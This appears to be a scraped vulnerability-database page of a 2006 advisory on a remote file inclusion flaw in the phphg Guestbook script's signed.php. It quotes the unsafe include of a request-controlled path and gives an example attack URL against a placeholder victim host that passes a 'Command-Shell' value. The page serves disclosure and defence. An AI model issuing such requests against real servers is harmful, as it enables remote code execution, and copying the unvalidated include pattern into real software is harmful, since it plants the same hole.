Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13121
HistoryJun 13, 2006 - 12:00 a.m.

phphg Guestbook Signed.PHP - Remote File Include Vulnerabilities

2006-06-1300:00:00
vulners.com
13

SaVSaK.CoM | SpC-x - The-BeKiR |

phphg Guestbook Signed.PHP - Remote File Include Vulnerabilities

Risk : High

Class: Remote

Script : phphg Guestbook

Credits : SpC-x

Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke

Code :

$phphg_real_path = "./";

include($phphg_real_path . 'common.php');

Vulnerable :

http://www.victim.com/phphg Guestbook/signed.php?phphg_real_path=Command-Shell